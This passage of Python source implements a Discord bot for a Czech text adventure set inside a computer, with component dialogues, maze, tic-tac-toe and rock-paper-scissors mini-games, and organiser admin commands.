se jinak asi nedostanete.\n\n    Ale každopádně, pokud chcete nějaká data, tak tady jste určitě na správném místě.\n    \"\"\"\n\n    _zadani_ksp = (\n        'ksp', \"Chtěli bychom si stáhnout zadání `KSP`, dáš nám nějaké?\",\n        [\"Dobře, ale vyberu pro vás to nejkratší, dejte mi chvilku.... 
Tak jo, tady ho máte: 33-5-X1: Toto je praktická open-data úloha. V odevzdávacím systému si necháte vygenerovat vstupy a odevzdáte příslušné výstupy. Záleží jen na vás, jak výstupy vyrobíte. Výše uvedené zadání úlohy je kompletní a přesně takové, jaké má být. Žádná část mu nechybí ani nepřebývá.\"], [(\"úžasně\", \"To zní naprosto `úžasně`, do toho rozhodně jdu!\", [], [])]\n )\n\n dialogue = [\n (yes(Item.rozsviceno.value), [\"Hej, zaslechla jsem teď .\"], []),\n (yes(Item.pametfix.value), [\"Hej, zaslechla jsem teď .\"],\n [('firmware', \"Pamět je v pořádku, ale potřebujeme teď stáhnout nějaký další `firmware`, tentokrát pro LED světla k větráku?\", [\"Ok, jdeme na to.\"],\n [('ok', '`Ok`, jdeme.', [], Action.moveToMinigame)]\n ),\n _zadani_ksp,\n ]\n ),\n (yes(Item.pametsofware.value), [\"Co tu ještě děláš? Utíkej!\"], []),\n (no(Item.pametfix.value), [\"Hej, zaslechla jsem teď .\"],\n [('firmware', \"To je zajímavý. Každopádně potřebujeme stáhnout nějaký `firmware` pro paměť, pomůžeš?\", [\"Pomůžu, ale prakticky všechno v poslední době zapomíná. Doporučuji si pospíšit.\"],\n [('víme', '`Víme` o tom, pospíšíme.', [], Action.moveToMinigame)]\n ),\n _zadani_ksp,\n ]\n ),\n ]\n\n special = []\n\n\n@dataclass(frozen=True)\nclass Motherboard:\n name = \"Motherboard\"\n at = \"u motherboardu\"\n to = \"k motherboardu\"\n\n description = \"\"\"Motherboard, matka všech komponent v počítač, tedy aspoň těch, které za to stojí (kdo by se staral o nějaké nepotřebné periferie, že ano).\n Její kořeny skrze sběrnice sahají všude, blahodárně napájí v��echny své součástky, stará se, aby si mezi sebou povídaly, a dohlíží i na to, aby nevznikaly nějaké\n problémy. Přesto si ve vzdáleném rohu desky všímáte, že tam je svět nějaký temnější a když oslovíte náhodné kolemjdoucí data putující po sběrnici, tak vás jen\n šeptem varují: \"Tam nechoď, tam je velká zlá součástka. Nikdo neví, jak se tam dostala, ale umí otrávit všechna data, co k ní dojdou. Říká se, že je to špión... ale já ti to neřekl, jo. Nikdy jsme se neviděl, jasné?\"\n\n Možná byste si s motheroardem měli promluvit. Vlastně vám není jasné, kde začít mluvit, ale máte takový pocit, že ať jste kdekoliv, tak vás uslyší.\n Přecijen byste ale mohli dojít do nějakého klidnějšího kouta a nestát uprostřed sběrnice.\n \"\"\"\n\n _q = [\"Co chceš?\", \"Všechno tu dělám sama.\", \"Ty moje děti jsou fakt spratci, ani si spolu beze mě nepovídají.\"]\n\n dialogue = [\n (yes(Item.mbinstruction.value), [\"Tak, já jsem připravená poslat do škodlivé součástky proud, napájecí cesty jsou připravené. Jestli je teda zdroj ochotný dýt proud navíc, je to docela skrblík. Pokud to s ním máte domluvené, tak se vydejte za procesorem, aby to spustil. Pamatujte, je to napájecí instrukce `XC00P147`.\"], []),\n (no(Item.vysano.value), _q,\n [('přepneš', \"V počítači je škodlivá součástka, kterou potřebujeme odpálit. `Přepneš` se prosím do režimu, abychom do ní mohli poslat více proudu?\",\n [\"Takhle špinavá rozhodně ne, podívejte na moje rozvodné obvody. Pošlu skrz ně víc proudu, zahřejí se, zapálí ten prach a všichni tady umřou. To chceš?\"],\n [('ok', '`Ok`, zkusíme s tím něco udělat.', [], [])]\n ),\n ]\n ),\n (no(Item.pametfix.value), _q,\n [('přepneš', \"S pomocí vysavače jsme všude okolo uklidili. `Přepneš` se teď?\", [\"Mohla bych, ale potřebuji instrukce, které jsou uložené někde v paměti. 
Zdá se ale, že paměť zapomněla, kde jsou...\"],\n [('ok', '`Ok`, zkusíme paměti pomoct.', [], [])]\n ),\n ]\n ),\n (yes(Item.pametfix.value), _q,\n [('přepneš', \"Paměti jsme aktualizovali firmware, už si vzpomněla! Přečteš instrukce a `přepneš` se?\", [\"Dobře, načítám instrukce... flashuji napájecí subprocesory... hotovo přepínám se.\"],\n [('ok', '`Ok`, moc díky!.', [], Action.obtainItem(Item.mbinstruction))]\n ),\n ]\n ),\n ]\n special = []\n\n\n@dataclass(frozen=True)\nclass Pamet:\n name = \"Paměť\"\n at = \"u paměti\"\n to = \"k paměti\"\n\n description = \"\"\"Když jste vešli do álejí paměti, tak se vám naskytl pohled na obrovskou kartotéku s miliony přihrádek po obou stranách.\n V kartotéce operovalo množství nakladačů, od malinkatých co najednou nesly jenom jednu přihrádku až po obrovská monstra, která najednou\n zvládla nabrat desítky přihrádek a poslat je po sběrnici pryč. Mezi nimi se proplétaly zase nakladače, které vybíraly jedničky a nuly ze sběrnic,\n balily je do krabic a do přihrádek ukládaly.\n\n Po chvíli pozorování jste si ale všimli zmatku. Některé nakladače zmateně jezdily sem a tam, jakoby nemohly přijít na to, do které části paměti\n některé z přihrádek uložily. Uprostřed paměťové áleje jste si všimli osamoceně sedící paměti. Dojdete k ní?\n \"\"\"\n\n dialogue = [\n (yes(Item.pametfix.value), [\"Tebe si pamatuju!\"], []),\n (no(Item.pametsofware.value), [\"Známe se? To je jedno; slyšela jsem teď super vtip. Chceš ho slyšet?\"],\n [('nechci', 'Spíš `nechci`, docela spěchám.', [], []),\n ('chci', \"Rozhodně `chci`, to zní skvěle!\", [\"Anglický nebo český?\"],\n [('anglický', 'Klidně `anglický`.', [\"The first computer bug actually involved Adam and Eve - their Apple only took one bite and it was a total disaster.\"],\n [('aktualizuješ', 'To je skvělé. `Aktualizuješ` se prosím? Nový firmware by mohl pomoci tvému zapomínání', [\"Žádný software si nepamatuji, že by mi síťová karta odříkávala. Kdy že to bylo?\"],\n [('ok', '`ok`, zkusíme nějaký firmware stáhnout...', [], [])]\n ),\n ],\n ),\n ('český', 'Spíše `český`.', [\"Ťuk ťuk!\\nKdo tam?\\nRekurze.\\nJaká rekurze?\\nŤuk ťuk!\"],\n [('aktualizuješ', 'To je skvělé. `Aktualizuješ` se prosím? Nový firmware by mohl pomoci tvému zapomínání', [\"Žádný software si nepamatuji, že by mi síťová karta odříkávala. Kdy že to bylo?\"],\n [('ok', '`ok`, zkusíme nějaký firmware stáhnout...', [], [])]\n ),\n ],\n ),\n ],\n ),\n ]\n ),\n # ano, je to více-méně copy-paste toho nahoře\n # ano, je to fuj\n (yes(Item.pametsofware.value), [\"Známe se? To je jedno; slyšela jsem teď super vtip. Chceš ho slyšet?\"],\n [('nechci', 'Spíš `nechci`, docela spěchám.', [], []),\n ('chci', \"Rozhodně `chci`, to zní skvěle!\", [\"Anglický nebo český?\"],\n [('anglický', 'Klidně `anglický`.', [\"The first computer bug actually involved Adam and Eve - their Apple only took one bite and it was a total disaster.\"],\n [('aktualizuješ', 'To je skvělé. `Aktualizuješ` se prosím? Nový firmware by mohl pomoci tvému zapomínání', [\"Na něco si vzpomínám! Jdu na to.\"],\n [('ok', '`ok`, to se povedlo.', [], Action.obtainItem(Item.pametfix))]\n ),\n ],\n ),\n ('český', 'Spíše `český`.', [\"Ťuk ťuk!\\nKdo tam?\\nRekurze.\\nJaká rekurze?\\nŤuk ťuk!\"],\n [('aktualizuješ', 'To je skvělé. `Aktualizuješ` se prosím? Nový firmware by mohl pomoci tvému zapomínání', [\"Na něco si vzpomínám! 
Jdu na to.\"],\n [('ok', '`ok`, to se povedlo.', [], Action.obtainItem(Item.pametfix))]\n ),\n ],\n ),\n ],\n ),\n ]\n ),\n ]\n\n special = []\n\n\n@dataclass(frozen=True)\nclass Zdroj:\n name = \"Zdroj\"\n at = \"u zdroje\"\n to = \"ke zdroji\"\n\n description = \"\"\"Cestou ke zdroji jste se málem nechali seškvařit probíhajícím útvarem elektronů, jejich velitel křičel něco jako: \"Póóóhyb, póóóhyb, myslíte si, že grafická karta se bez nás obejde? I vaše elektronová babička běhala rychlejc. Póóóhyb.\"\n Vyhnuli jste se jim úskokem do nevyužité napájecí větve, pak jste se oklepali a už opatrně u stěny jste došli až do zdroje.\n\n Tady to celé hučí, funí, bzučí a ve vzduchu cítíte všechen ten výkon. Z vrchu přichází od větráku neustálý proud vzduchu, ale i s ním je tu docela teplo.\n Ani si nechcete představit, co by se stalo, kdyby najednou přestal foukat.\n \"\"\"\n\n # Slepá cesta navíc nikdy neuškodí ;)\n _vypnes_se = ('vypneš', \"`Vypneš` se prosím?\", [\"Dobř... tak počkat, máte k tomuhle pověření? Jste od tlačítka? Nebo jdete s příkazem od procesoru? Chci vidět vaše pověření a to hned! Nemáte? Tak to nic nebude.\"], [(\"pardón\", \"`Pardón`, to jsme nevěděli.\", [], [])])\n _nic = ('nic', \"Vlastně `nic`, promiň že rušíme.\", [], [])\n\n dialogue = [\n (no(Item.zrychleno.value), [\"Na co čumíš?\", \"Ano, 350W, čteš to správně.\"],\n [('navýšit', \"Můžeš prosím `navýšit` proud do procesoru?\", [\"Ani náhodou, je tu hrozný horko.\"],\n [('ok', '`Ok`, zkusíme s tím něco udělat.', [], [])]\n ),\n _vypnes_se,\n _nic,\n ]\n ),\n (no(Item.zdrojporazen.value), [\"Na co čumíte?\", \"Ano, 350W, čtete správně.\"],\n [('navýšit', \"Můžeš prosím `navýšit` proud do procesoru?\", [\"Mohl bych, ale musíš mi dokázat, že na to máte.\"],\n [('co', 'Na `co` máme?', [\"Přece na to. Poražte mě v piškvorkách a proud je váš.\"],\n [('porazím', \"`Porazím` tě hravě, sleduj.\", [], Action.moveToMinigame),\n ('ne', \"To spíš `ne`, piškvorky hrát neumíme.\", [], []),\n ],\n )\n ]\n ),\n _vypnes_se,\n _nic,\n ]\n ),\n (yes(Item.zdrojporazen.value), [\"Respekt.\", \"Pěkná práce.\"], [])\n ]\n\n\n special = []\n\n\n@dataclass(frozen=True)\nclass Vetraky:\n name = \"Větrák\"\n at = \"u větráku\"\n to = \"k větráku\"\n\n description = \"\"\"Šplháte větrací šachtou od zdroje k větráku a cítíte narůstající průvan. Za chvíli je tu takový hluk, že si myslíte, že už větší být nemůže. Ale pak vylezete za další záhyb a ještě se zesílá.\n Tady mluvení nedává smysl, budete muset řvát. A to ještě jenom po větru, jinak vás stejně nikdo neuslyší. Navíc za záhybem už také přestalo prosvítat světlo ze zdroje a vám asi nezbude nic jiného, než\n si na všechno kolem svítit.\n \"\"\"\n\n dialogue = [\n (yes(Item.zrychleno.value), [\"rychlejc to neumím!\"], []),\n (no(Item.rozsviceno.value), [\"co se děje? 
kdo tam?\"],\n [('zrychlit', \"potřebujeme více chlazení pro zdroj, můžeš se prosím `zrychlit`?\", [\"je tu tma jako v pytli, potřebuju lepší firmware osvětlení!\"],\n [('dobře', '`dobře`, nějaké ti zkusíme sehnat.', [], [])]\n ),\n ]\n ),\n (yes(Item.rozsviceno.value), [\"to mi tu to hezky svítí.\"],\n [('zrychlit', \"můžeš se tedy prosím `zrychlit` teď?\", [\"ok, zkusím to.\"],\n [('dobře', '`dobře`, díky!', [], Action.obtainItem(Item.zrychleno))]\n ),\n ]\n ),\n ]\n\n special = [Special.loud, Special.darkness]\n\n\n@dataclass(frozen=True)\nclass Procesor:\n name = \"Procesor\"\n at = \"u procesoru\"\n to = \"k procesoru\"\n\n description = \"\"\"Stoupáte po schodech z motherboardu až na bájný vrcholek patice, kde sídlí vševědoucí procesor. Cestou minete řady kondenzátorů stojících\n na stráži okolo procesoru a pak překročíte hranu patice a vejdete do paláce procesoru.\n\n Na hlavě má obrovskou hliníkovou korunu, na jejímž vrcholku má ještě svůj vlastní osobní větrák a vítr z něj mu čechrá jeho stříbrné vlasy. Stojí na tisících\n zlatých nožek a když se na procesor podíváte, tak zahlédnete několik hlav, kde každá dělá něco úplně jiného. Ještě nikdy jste nezahlédli někoho tak\n efektivního. Do paláce proudí zástupy žadatelů, kteří chtějí chvilku jeho času, a procesor se ochotně každému aspoň chviličku věnuje. Někdy si sice musí\n žadatel chviličku počkat, ale pak je přijat se vší parádou.\n\n I na vás snad za chviličku přijde řada a jedna z hlav procesoru se vás laskavě ujme.\n \"\"\"\n\n dialogue = [\n (lambda _: True, [\"Přišli jste k části procesoru a zaklepali na firewall. Chvilku na něj prosím počkejte.\"], []),\n ]\n\n special = []\n\n\n# není úplně hezké, ale co naděláš...\nlocations = [Vysavac(), Sitovka(), Motherboard(), Pamet(), Zdroj(), Vetraky(), Procesor()]\nvysavac, sitovka, motherboard, pamet, zdroj, vetraky, procesor = locations\n\npaths = {\n vysavac: [sitovka],\n sitovka: [vysavac, motherboard],\n motherboard: [pamet, procesor, zdroj, sitovka],\n pamet: [motherboard],\n zdroj: [motherboard, vetraky],\n vetraky: [zdroj],\n procesor: [motherboard],\n}\n\nend_game_text = \"\"\"\n Přesvědčili jste procesor, aby vyslal po sběrnici instrukci `XC00P147`. Na sběrnici, na které poslouchaly\n naflashované napájecí čipy základní desky. Trvalo to jen zlomek sekundy, během které si napájecí čipy\n u zdroje ověřily, že jim umí dodat dostatek proudu, a pak již otevřely cestu proudu do osamocené napájecí\n větve vedoucí do rohu desky. Zároveň vypnuly na této lince všechny proudové ochrany.\n\n Napětí se skokově zvedlo a zlý invazní čip, který nějaký útočník přidal na okraj základní desky aby odposlouchával\n a škodil, se začal potit. Ale ještě to zvládal. Napájecí větev se začala postupně zahřívat (ještě, že jste z ní odstranili\n prach!) a větrák u zdroje se roztočil na nejvyšší výkon, ale zdroj tu zátěž zvládl.\n\n \"Ještě pár sekund, už to bude,\" říkala si základní deska, která začínala cítit, že se napájecí větev rozžhavuje stále\n více a více. A najednou prásk! Ze zlého čipu v rohu základní desky najednou unikl všechen magický kouř a plastový obal\n z toho nejčernějšího plastu bez potisku se roztekl. Zbytek počítače však žil a všechny komponenty cítily, jak v tu chvíli\n zmizela přítomnost čehosi zlého, co je tu poslední dobou strašilo.\n\n \"Děkuji vám,\" prohlásil procesor a vy jste najednou cítili, jak vás vesmírná síla volá kamsi dál. Uklonili jste\n se procesoru a pomalu jste se vznesli z vodičů do vzduchu a pak kamsi do dáli. 
Další počítače čekaly na svojí\n záchranu a vy jste si v tuto chvíli uvědomili, že to je přesně vaše poslání.\n\n Pokračování příště…\n\"\"\"\n\n# ---------------------------------------- CONTENT ----------------------------------------\n\nasync def update(id, response) -> bool:\n \"\"\"Upraví stav pro daný team podle toho, jak zareagovali. Vrátí true/false podle toho,\n zda se update povedl a má se volat write.\"\"\"\n global org_channel\n\n location = Utilities.get_location(id)\n position = Utilities.get_location_position(id)\n items = list(Utilities.get_items(id))\n\n sanitized_response = response.strip().lower()\n\n if position != None:\n position = list(position)\n\n # jsme-li v minihře\n if len(position) != 0 and isinstance(position[-1], int):\n if location == vysavac:\n pos = (4, 1)\n solution = [\n \"#########\",\n \"#### ####\",\n \"#### #\",\n \"# ### #\",\n \"# # #\",\n \"# #######\",\n \"# #######\",\n \"#########\",\n ]\n\n mapping = {\n \"l\": (\"doleva\", (-1, 0)),\n \"r\": (\"doprava\", (1, 0)),\n \"u\": (\"nahoru\", (0, -1)),\n \"d\": (\"dolů\", (0, 1)),\n }\n\n if sanitized_response.replace(\"l\", \"\").replace(\"u\", \"\").replace(\"r\", \"\").replace(\"d\", \"\") != \"\":\n await send_with_special(id, f\"**{location.name}:** V instrukcích jsou špatné znaky!\", location.special)\n return False\n\n for char in sanitized_response:\n pos = (pos[0] + mapping[char][1][0], pos[1] + mapping[char][1][1])\n\n if solution[pos[1]][pos[0]] == \"#\":\n await send_with_special(id, f\"**{location.name}:** Při jízdě {mapping[char][0]} jsem narazil do zdi. Vracím se zpět.\", location.special)\n return False\n\n if pos == (1, 6):\n await send_with_special(id, f\"**{location.name}:** Úspěšně jsem k počítači dojel! Vysávám...\", location.special)\n Utilities.set_location_position(id, [])\n Utilities.get_items(id).append(Item.vysano.value)\n return True\n\n await send_with_special(id, f\"**{location.name}:** Do ničeho jsem nenarazil, ale k počítači jsem se nedostal. Vracím se zpět.\", location.special)\n return False\n\n if location == zdroj:\n try:\n pos = int(sanitized_response)\n\n if not (1 <= pos <= 9):\n await send_with_special(id, f\"**{location.name}:** Neumíš počítat? `{pos}` není platný.\", location.special)\n return False\n\n data = Utilities.get_location_position(id)\n valid_moves = TicTacToe.valid_moves(data)\n\n if pos not in valid_moves:\n await send_with_special(id, f\"**{location.name}:** No tak tam asi, ne, tam už něco je.\", location.special)\n return False\n\n data.append(pos)\n\n if TicTacToe.won(data) == 2:\n await send_with_special(id, f\"**{location.name}:** Pff, slušný výkon, proud máte navýšený.\" + \"\\n\" + TicTacToe.show(data), location.special)\n Utilities.set_location_position(id, [])\n Utilities.get_items(id).append(Item.zdrojporazen.value)\n return True\n\n valid_moves = TicTacToe.valid_moves(data)\n data.append(choice(valid_moves))\n\n if TicTacToe.won(data) == 1:\n await send_with_special(id, f\"**{location.name}:** Ha, vyhrál jsem! Zkus to třeba příště.\" + \"\\n\" + TicTacToe.show(data), location.special)\n Utilities.set_location_position(id, [])\n return True\n\n if TicTacToe.won(data) == 0 and len(TicTacToe.valid_moves(data)) == 0:\n await send_with_special(id, f\"**{location.name}:** Remíza, takže smůla! 
Zkus to někdy jindy.\" + \"\\n\" + TicTacToe.show(data), location.special)\n Utilities.set_location_position(id, [])\n return True\n\n msg = choice([f\"**{location.name}:** Zajímavý tah.\", f\"**{location.name}:** Hmm...\", f\"**{location.name}:** Slabý tah.\"]) + \"\\n\" + TicTacToe.show(data)\n\n await send_with_special(id, msg, location.special)\n return False\n\n\n except ValueError:\n await send_with_special(id, f\"**{location.name}:** Co to meleš, `{sanitized_response}` není číslo.\", location.special)\n return False\n\n if location == sitovka:\n knp = [\"kámen\", \"nůžky\", \"papír\"]\n if sanitized_response not in knp:\n await send_with_special(id, f\"**{location.name}:** Hrajeme `kámen`, `nůžky` nebo `papír`!\", location.special)\n return False\n\n faejio = choice(knp)\n\n if sanitized_response == faejio:\n await send_with_special(id, f\"**{location.name}:** Také jsem měl `{faejio}`, remíza.\", location.special)\n return False\n\n if knp.index(sanitized_response) == (knp.index(faejio) - 1) % len(knp):\n msg = f\"Měl jsem `{faejio}`, vyhrál jsi!\"\n Utilities.get_location_position(id)[-1] = int(Utilities.get_location_position(id)[-1] / uniform(5, 10))\n else:\n msg = f\"Měl jsem `{faejio}`, prohrál jsi!\"\n Utilities.get_location_position(id)[-1] = int(Utilities.get_location_position(id)[-1] / uniform(2, 3))\n\n if Utilities.get_location_position(id)[-1] < 10:\n msg += \" Staženo!\"\n await send_with_special(id, f\"**{location.name}:** {msg}\", location.special)\n Utilities.set_location_position(id, [])\n if Item.pametfix.value not in Utilities.get_items(id):\n Utilities.get_items(id).append(Item.pametsofware.value)\n else:\n Utilities.get_items(id).append(Item.rozsviceno.value)\n return True\n\n await send_with_special(id, f\"**{location.name}:** {msg} {format_remaining_time(Utilities.get_location_position(id)[-1])}\", location.special)\n return False\n\n # stojíme u lokace\n if position is None:\n # můžeme dojít ke komponentě\n if sanitized_response == \"dojít\":\n Utilities.set_location_position(id, [])\n\n if location == procesor:\n await org_channel.send(f\"Team {Utilities.get_data(id)['name']} došel k procesoru.\")\n\n return True\n\n # můžeme jít do dostupných lokací\n try:\n int_response = int(sanitized_response)\n\n if int_response <= 0 or int_response > len(paths[location]):\n await send_with_special(id, \"Neplatné číslo lokace.\", location.special)\n return False\n\n Utilities.set_location(id, paths[location][int_response - 1])\n return True\n\n except ValueError:\n await send_with_special(id, \"Neplatná možnost.\", location.special)\n return False\n\n # jsme u komponenty - vždy můžeme jít zpět\n if position == []:\n if sanitized_response == \"zpět\":\n if location == procesor:\n await org_channel.send(f\"Team {Utilities.get_data(id)['name']} odešel od procesoru.\")\n\n Utilities.set_location_position(id, None)\n return True\n\n # najít správnou větev\n for condition, _, other in location.dialogue:\n if condition(items):\n break\n\n # dojdeme v dialogu tam, kde jsme byli\n while len(position) != 0:\n w = position.pop(0)\n for word, _, _, oth in other:\n word, oth\n if word == w:\n other = oth\n break\n\n for ww, _, resp, oth in other:\n if Special.loud in location.special and response != response.upper():\n await send_with_special(id, \"COŽE? 
VŮBEC TĚ NESLYŠÍM.\", location.special)\n return False\n\n if (sanitized_response == ww) if Special.loud not in location.special else (response == ww.upper()):\n # speciální akce na konci dialogu (přidávání itemu, minihra,...)\n if resp == [] and type(oth) != list:\n oth(id)\n\n # pokud jsme v minihře, necháme to takhle\n if len(Utilities.get_location_position(id)) > 0 and isinstance(Utilities.get_location_position(id)[-1], int):\n return True\n\n # konec dialogu\n if resp == []:\n Utilities.set_location_position(id, [])\n\n # další část dialogu\n else:\n Utilities.set_location_position(id, Utilities.get_location_position(id) + [ww])\n return True\n else:\n text = \"Neplatná možnost.\"\n if Special.loud in location.special:\n text = text.upper()\n\n await Utilities.get_channel(id).send(text)\n return False\n\n\nasync def send_with_special(id, message, special):\n if Special.loud in special:\n message = message.upper()\n\n if Special.darkness in special:\n # temnota jen pokud už není rozsvíceno\n if Item.rozsviceno.value not in Utilities.get_items(id):\n message = f\"|| {message} ||\"\n\n await Utilities.get_channel(id).send(message)\n\n\nasync def write(id, initial_paragraph=False):\n \"\"\"Vypíše zprávu do kanálu teamu po aktuální interakci.\"\"\"\n location = Utilities.get_location(id)\n position = Utilities.get_location_position(id)\n items = list(Utilities.get_items(id))\n\n if initial_paragraph:\n text = \"\"\"Vítejte v adventuře!\n\n Jste zde v roli elektromagnetické entity, která se nějak dostala do počítače. Nevíte moc, co je to za počítač ani kde se nachází, ale vesmír chtěl, abyste se ocitli právě zde.\n Možná to má něco do činění se zlem, které uvnitř počítače cítíte – něco tu je a nemá tu co dělat. A nedávno se to probudilo po letech spánku. Snad bude víc vědět některá z komponent…\n\n\n Ovládání: <@&835801661417979914>, která vás bude provázet hrou, vám vždy vypíše informace o tom, kde se nacházíte a jaká máte v tuto chvíli možnosti. Každá možnost by u sebe měla mít `zvýrazněno`, jakým\n klíčovým slovem se dá zvolit (v případě čísel je to jen číslo bez závorek okolo). Když toto slovo kdokoliv z vašeho týmu napíše jako zprávu, tak tím vyvoláte danou volbu a <@&835801661417979914> vám\n napíše, kam jste se dostali. V případě, že <@&835801661417979914> nebude rozumět, tak si postěžuje. Občas také můžete potkat jiné speciální aktivity, ale všechny se ovládají stejným způsobem, napsáním\n zprávy v této vaší místnosti.\n\n Nad <@&835801661417979914> bdí ještě <@&838777490217500693> a pokud by vám v některém místě <@&835801661417979914> přestala fungovat, tak může zasáhnout. Pokud by si vašeho problému nevšimla, tak pište do kanálu <#839145972298678352>.\n \"\"\"\n\n paragraphs = text.split(\"\\n\\n\")\n\n message = \"\"\n for paragraph in paragraphs:\n message += \"> \" + \" \".join(map(lambda x: x.strip(), paragraph.split(\"\\n\"))) + \"\\n> \\n\"\n message = message.rstrip(\"> \\n\") + \"\\n\"\n\n await Utilities.get_channel(id).send(message)\n\n if position != None:\n position = list(position)\n\n # jsme-li v minihře\n if len(position) != 0 and isinstance(position[-1], int):\n # úvody miniher\n if location == vysavac:\n await send_with_special(id, f\"**{location.name}**: Super, tak navigujte. Přijímám posloupnosti znaků L/U/R/D podle toho, zda mám jet doleva/nahoru/doprava/dolů.\", location.special)\n return\n\n if location == zdroj:\n msg = f\"**{location.name}**: Nemáš šanci. 
Začínám; říkej čísla od **1** do **9** podle toho, na jaké pozici chceš položit kolečko.\"\n pos = Utilities.get_location_position(id)\n pos.append(choice(TicTacToe.valid_moves([])))\n msg += \"\\n\" + TicTacToe.show(pos)\n await send_with_special(id, msg, location.special)\n return\n\n if location == sitovka:\n remaining_time = randint(7000, 20000)\n Utilities.get_location_position(id)[-1] = remaining_time\n msg = f\"**{location.name}**: Začínám stahovat. Pojď mezi tím hrát `kámen`/`nůžky`/`papír`! {format_remaining_time(remaining_time)}\"\n await send_with_special(id, msg, location.special)\n return\n\n return\n\n # když vejdeme do lokace\n message = \"\"\n if position is None:\n message += f\"**Nacházíte se {location.at}:**\\n\"\n\n paragraphs = location.description.split(\"\\n\\n\")\n\n for paragraph in paragraphs:\n message += \"> \" + \" \".join(map(lambda x: x.strip(), paragraph.split(\"\\n\"))) + \"\\n> \\n\"\n message = message.rstrip(\"> \\n\") + \"\\n\\n\"\n\n message += f\"-> `Dojít` {location.to},\\n\"\n for i, path in enumerate(paths[location]):\n message += f\"-> `({i + 1})` cestovat {path.to}{',' if i != len(paths[location]) - 1 else '.'}\\n\"\n message = message.strip(\"\\n\")\n await send_with_special(id, message, location.special)\n return\n\n # když se poprvé začneme bavit s komponentou\n for condition, responses, other in location.dialogue:\n if condition(items):\n if position == []:\n if len(responses) == 0:\n message += f\"**{location.name}** nereaguje:\\n\"\n else:\n message += f\"**{location.name}**: {choice(responses)}\\n\"\n\n for l in other:\n message += f\"-> {l[1]}\\n\"\n message += f\"-> Jít `zpět`.\"\n await send_with_special(id, message, location.special)\n return\n break\n\n while len(position) != 0:\n w = position.pop(0)\n for word, _, response, oth in other:\n if word == w:\n other = oth\n break\n else:\n pass\n\n message += f\"**{location.name}**: {choice(response)}\\n\"\n\n for _, sentence, _, _ in other:\n message += f\"-> {sentence}\\n\"\n message = message.strip(\"\\n\")\n await send_with_special(id, message, location.special)\n\n@client.event\nasync def on_ready():\n global data, channels, org_channel, started\n\n for channel in client.get_all_channels():\n # skip voice channels\n if not isinstance(channel, discord.TextChannel):\n continue\n\n # roomy jsou ve formátu team-*\n if channel.name.startswith(\"team-\"):\n data[channel.id] = {\n \"name\": channel.name,\n \"location\": locations.index(motherboard),\n \"items\": [],\n \"location_position\": None}\n\n channels[channel.id] = channel\n\n if channel.name.startswith(\"org-bot\"):\n org_channel = channel\n\n\n@client.event\nasync def on_message(message):\n \"\"\"Volá se, když se někde pošle zpráva.\"\"\"\n global data, started, last_save_time\n\n # save každých 10s\n now = datetime.now()\n if (now - last_save_time).total_seconds() > 10 and started:\n last_save_time = now\n await org_channel.send(\"Automaticky ukládám stav hry.\")\n await save()\n\n # bot neodpovídá sobě!\n if message.author == client.user:\n return\n\n # odpověď na DM, může být něco vtipného\n if str(message.channel).startswith(\"Direct Message\"):\n return\n\n if message.channel.name == \"org-bot\":\n parts = message.content.lower().split()\n\n if len(parts) == 0:\n return\n\n if parts[0] == \"help\" or parts[0] == \"?\":\n await message.channel.send(\n \"**Příkazy:**\\n\"\n \"> `save` – uloží stav hry\\n\"\n \"> `loadiknowwhatimdoing` – nahraje stav hry, přepisujíc ten aktualní\\n\\n\"\n \"> `status ` – vypíše aktuální stav 
všech teamů / jednoho teamu\\n\"\n \"> `startiknowwhatimdoing ` – začne hru: umožní účastníkům interagovat s botem v kanálech a vypíše startovní message; pokud je specifikován backup, tak se nevypíše úvodní zpráva\\n\"\n \"> `cleariknowwhatimdoing` – vyčistí velký počet zpráv v kanálu orgů a kanálech teamů\\n\\n\"\n \"> `add/remove ` – přidá/odstraní teamu daný item\\n\"\n \"> `move <číslo lokace>` – posune team do dané lokace; od 0 z pole [vysavac, sitovka, motherboard, pamet, zdroj, vetraky, procesor] \\n\"\n \"> `finish ` – vypíše teamu koncovou zprávu\\n\"\n )\n return\n\n if parts[0] == \"save\":\n await save()\n await message.channel.send(f\"Manuálně ukládám stav hry.\")\n return\n\n if parts[0] == \"loadiknowwhatimdoing\":\n load()\n await message.channel.send(f\"Manuálně nahrávám stav hry.\")\n return\n\n if parts[0] == \"finish\":\n if len(parts) == 2:\n for d in data:\n if parts[1] == data[d][\"name\"]:\n paragraphs = end_game_text.split(\"\\n\\n\")\n\n message = \"\"\n for paragraph in paragraphs:\n message += \"> \" + \" \".join(map(lambda x: x.strip(), paragraph.split(\"\\n\"))) + \"\\n> \\n\"\n message = message.rstrip(\"> \\n\") + \"\\n\"\n\n await Utilities.get_channel(d).send(message)\n return\n\n await message.channel.send(f\"Takový team neexistuje.\")\n return\n\n if parts[0] == \"status\":\n if len(parts) == 2:\n for d in data:\n if parts[1] == data[d][\"name\"]:\n await message.channel.send(f\"Data teamu {parts[1]}: \\n```yaml\\n{yaml.dump(data[d], indent=4)}\\n```\")\n return\n\n await message.channel.send(f\"Takový team neexistuje.\")\n return\n\n await message.channel.send(f\"Data teamů: \\n```yaml\\n{yaml.dump(data, indent=4)}\\n```\")\n return\n\n if parts[0] == \"startiknowwhatimdoing\":\n inpar = True\n if len(parts) == 2:\n if parts[1] == \"backup\":\n inpar = False\n\n for id in data:\n await write(id, initial_paragraph=inpar)\n started = True\n return\n\n if parts[0] == \"cleariknowwhatimdoing\":\n await message.channel.purge(limit=10000)\n\n for id in data:\n await Utilities.get_channel(id).purge(limit=10000)\n\n return\n\n if parts[0] in (\"add\", \"remove\", \"move\"):\n try:\n action, id, item = parts\n\n for team in data:\n if data[team][\"name\"] == id:\n id = team\n break\n else:\n await message.channel.send('Team s takovým jménem neexistuje.')\n return\n\n # pro přidávání/odebrání itemu\n if parts[0] != \"move\":\n # test toho, zda item existuje\n Item[item]\n else:\n item = int(item)\n\n if action == \"add\":\n Utilities.get_data(id)[\"items\"].append(item)\n await message.channel.send('Item úspěšně přidán.')\n return\n\n if action == \"remove\":\n if item not in Utilities.get_data(id)[\"items\"]:\n await message.channel.send('Team tento item nemá.')\n return\n Utilities.get_data(id)[\"items\"].remove(item)\n await message.channel.send('Item úspěšně odstraněn.')\n return\n\n if action == \"move\":\n Utilities.set_location(id, locations[item])\n Utilities.set_location_position(id, None)\n\n await message.channel.send(f'Team přesunut do: {locations[item].name}.')\n await write(id)\n return\n\n except ValueError:\n await message.channel.send('Lokace musí být číslo!')\n except KeyError:\n await message.channel.send('Item s takovým jménem neexistuje.')\n except Exception:\n await message.channel.send('Něco se nepovedlo. 
